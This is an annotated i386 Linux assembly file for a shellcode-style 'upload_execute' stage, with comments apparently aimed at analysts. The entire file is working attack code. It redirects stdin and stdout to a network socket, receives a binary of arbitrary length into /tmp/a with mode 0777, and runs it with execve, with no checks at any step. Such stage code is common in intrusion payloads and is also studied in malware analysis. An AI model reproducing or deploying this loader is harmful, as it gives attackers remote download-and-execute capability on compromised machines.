# AT&T syntax, Linux/i386 (int $0x80 ABI), hand-written position-independent
# code.  The "Logic" list below is the author's; the remaining comments
# describe only what the visible instructions do.
#
# Register roles for the whole of upload_execute:
#   esi = socket fd (value returned by test_listen, which is not in this file)
#   edi = 0 for the entire routine; constants are formed as lea N(%edi)
#   ebp = base of a 16-byte scratch frame:
#         4(%ebp)  fd of /tmp/a      8(%ebp)  pointer to "/tmp/a"
#         12(%ebp) mmap address      0(%ebp)  unused
#   eax/ebx/ecx/edx = syscall number and arguments, per call
# The stack is never unwound and no ret is reached: the routine ends in
# execve and, if that fails, execution runs past upload_execute_end.
# No syscall return value is checked anywhere in this routine.
#
# Observable behaviour, for analysts (every value is taken from the code):
# close(0..2); dup2(sock,1); dup2(sock,0); open("/tmp/a", O_CREAT|O_RDWR,
# 0777); a 4-byte length read with MSG_WAITALL; one MAP_SHARED old_mmap +
# ftruncate + recv of that many bytes into the mapping; then
# execve("/tmp/a", ["/tmp/a"], NULL) with stdin/stdout on the socket and
# stderr left closed.
.globl main
main:
        call    test_listen                 # external; its eax result is used as the socket fd
        mov     %eax, %esi                  # esi = fd; falls straight through into upload_execute
#
# Logic:
#
# 1) open file /tmp/a
# 2) read length from fd (MSG_WAITALL)
# 3) read file in chunks from fd
# 4) write chunks to file
# 5) close file
# 6) execve
#
# Expects fd in esi
#
# Note: steps 3-4 are implemented as a single recv into a MAP_SHARED
# mapping of the file (see recv_from_socket), not as a chunk loop.
upload_execute:
        sub     $0x10, %esp                 # 16-byte scratch frame
        mov     %esp, %ebp                  # ebp = frame base (slot map in the header)
        xor     %edi, %edi                  # edi = 0, kept for the rest of the routine

close_std_fds:                              # close(0); close(1); close(2)
        xor     %ebx, %ebx                  # fd 0
        mov     $0x6, %al                   # SYS_close = 6; only al is written, so the upper
                                            # 24 bits of eax are assumed zero here (small fd
                                            # from test_listen) and after each call (previous
                                            # close returned 0)
        int     $0x80
        inc     %ebx                        # fd 1
        mov     $0x6, %al
        int     $0x80
        inc     %ebx                        # fd 2
        mov     $0x6, %al
        int     $0x80

dup_std_fds:                                # dup2(sock, 1); dup2(sock, 0); fd 2 is not re-opened
        mov     %esi, %ebx                  # oldfd = socket
        lea     1(%edi), %ecx               # newfd = 1
        lea     63(%edi), %eax              # SYS_dup2 = 63
        int     $0x80
        dec     %ecx                        # newfd = 0
        lea     63(%edi), %eax
        int     $0x80

open_file:                                  # fd = open("/tmp/a", O_CREAT|O_RDWR, 0777)
        xor     %edx, %edx
        xor     %ecx, %ecx
        mov     $0x42, %cl                  # O_CREAT | O_RDWR
        push    %edx                        # NUL terminator dword
        mov     $0x612f, %bx                # "/a" in the low half of ebx; the upper half is
                                            # the upper half of the socket fd, assumed 0
        push    %ebx                        # "/a\0\0"
        push    $0x706d742f                 # "/tmp"  -> stack now reads "/tmp/a\0..."
        mov     %esp, %ebx                  # pathname
        mov     %ebx, 8(%ebp)               # keep pathname for execve below
        lea     5(%edi), %eax               # SYS_open = 5
        mov     $0x1ff, %dx                 # mode 0777 (edx was zeroed above)
        int     $0x80
        mov     %eax, 4(%ebp)               # save file fd (unchecked; may be -errno)

recv_length:                                # recv(sock, &len, 4, MSG_WAITALL) via socketcall
        sub     $0x4, %esp                  # reserved dword; not actually used as the buffer
        lea     255(%edi), %ebx
        inc     %ebx                        # 256 = MSG_WAITALL
        push    %ebx                        # args[3] = flags
        lea     4(%edi), %ebx
        push    %ebx                        # args[2] = 4 bytes
        lea     4(%esp), %ebx               # esp+4 is the flags dword just pushed, so the
                                            # buffer aliases args[3], not the reserved slot
        push    %ebx                        # args[1] = buffer
        push    %esi                        # args[0] = socket fd
        mov     %esp, %ecx                  # ecx = argument block for socketcall
        lea     102(%edi), %eax             # SYS_socketcall = 102
        lea     10(%edi), %ebx              # SYS_RECV = 10
        int     $0x80                       # socketcall copies the block before recv stores
                                            # into it, so the aliasing does not affect the call
        mov     12(%esp), %edx              # edx = received length (args[3]) in host byte
                                            # order, not validated; eax (bytes received) ignored

mmap_file:                                  # old_mmap(&{NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0})
        lea     90(%edi), %eax              # SYS_mmap = 90 (i386 old_mmap: ebx -> arg struct)
        push    %edi                        # offset = 0
        push    4(%ebp)                     # fd of /tmp/a
        lea     1(%edi), %ebx
        push    %ebx                        # flags = MAP_SHARED
        lea     3(%edi), %ebx
        push    %ebx                        # prot = PROT_READ | PROT_WRITE
        push    %edx                        # length from recv_length
        push    %edi                        # addr = NULL
        mov     %esp, %ebx                  # ebx = &mmap_arg_struct
        int     $0x80                       # eax = mapping (unchecked); the file may still be
                                            # shorter than len here, ftruncate below extends it
        mov     %eax, 12(%ebp)              # save mapping address for munmap

truncate_file:                              # ftruncate(fd, len): size the file to back the mapping
        push    %eax                        # preserve mapping address across the call
        mov     %edx, %ecx                  # length
        mov     4(%ebp), %ebx               # file fd
        lea     93(%edi), %eax              # SYS_ftruncate = 93
        int     $0x80
        pop     %eax                        # eax = mapping address again

recv_from_socket:                           # recv(sock, mapping, len, MSG_WAITALL): one call, no loop
        lea     255(%edi), %ebx
        inc     %ebx                        # 256 = MSG_WAITALL
        push    %ebx                        # args[3] = flags
        push    %edx                        # args[2] = length from recv_length
        push    %eax                        # args[1] = buffer = mapping
        push    %esi                        # args[0] = socket fd
        mov     %esp, %ecx                  # argument block
        lea     102(%edi), %eax             # SYS_socketcall
        lea     10(%edi), %ebx              # SYS_RECV
        int     $0x80                       # bytes received (eax) never compared with len

munmap_file:                                # munmap(mapping, len); MAP_SHARED, so the data is in the file
        mov     12(%ebp), %ebx
        mov     %edx, %ecx
        lea     91(%edi), %eax              # SYS_munmap = 91
        int     $0x80

close_fd:                                   # close(fd)
        mov     4(%ebp), %ebx
        lea     6(%edi), %eax               # SYS_close = 6
        int     $0x80

execve:                                     # execve("/tmp/a", {"/tmp/a", NULL}, NULL)
        xor     %edx, %edx                  # envp = NULL
        push    %edx                        # argv[1] = NULL
        push    8(%ebp)                     # argv[0] = pathname saved in open_file
        mov     %esp, %ecx                  # argv
        mov     (%esp), %ebx                # filename = pathname
        lea     11(%edi), %eax              # SYS_execve = 11
        int     $0x80                       # on failure execution continues past upload_execute_end
upload_execute_end: